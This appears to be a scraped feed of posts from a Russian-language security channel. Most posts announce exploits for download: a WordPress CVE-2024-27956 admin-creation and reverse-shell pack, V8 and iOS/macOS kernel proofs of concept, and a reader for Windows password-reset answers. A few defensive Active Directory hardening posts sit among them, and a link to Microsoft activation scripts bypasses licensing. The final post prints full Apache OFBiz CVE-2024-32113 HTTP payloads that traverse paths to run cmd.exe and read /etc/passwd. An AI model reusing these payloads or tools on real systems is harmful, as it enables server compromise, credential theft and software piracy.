Microsoft Activation Scripts (MAS)
*
*
download MAS
download windows ALL version + server + office
#win
*
Latest Version: 2.6
Release date: 20-Apr-2024*
download MAS
download windows ALL version + server + office
#win
👍26👌3
🔥10
Active Directory Hardening Series
*
Part 1 – Disabling NTLMv1
Part 2 – Removing SMBv1
Part 3 – Enforcing LDAP Signing
Part 4 – Enforcing AES for Kerberos
#AD
*
Part 1 – Disabling NTLMv1
Part 2 – Removing SMBv1
Part 3 – Enforcing LDAP Signing
Part 4 – Enforcing AES for Kerberos
#AD
👍18🔥7
Инструмент для чтения контрольных вопросов и ответов.
Это возможно с помощью
*
ReadResetData.c
#win
Это возможно с помощью
SamQueryInformationUser(UserResetInformation).*
ReadResetData.c
#win
👍11🔥6
VPN
*
Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как
*
Читаем ТУТ
*
Большой список VPN exit NODE
#vpn #detect
*
Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как
NordVPN или ExpressVPN. *
Читаем ТУТ
*
Большой список VPN exit NODE
#vpn #detect
👍21🔥9👌1
UAF of wasm memory buffer due to mismatch of cached memory in graph-builder-interface in function ReloadInstanceCacheIntoSsa.
*
POC + exploit + video
*
POC + exploit + video
🔥6
WordPress_Auto_Admin_Account_and_Reverse_Shell_cve_2024_27956.zip
3 KB
cve-2024-27956
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
🔥16👍7
CVE-2024-27804
уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра.
*
POC exploit
#IOS #MAC #kernel
уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра.
*
POC exploit
#IOS #MAC #kernel
🔥18👍7😱4
CVE-2024-32113 Apache-OFBiz
*
POC для WIN
POC для *NIX
*
POC для WIN
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>POC для *NIX
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>👍17🔥7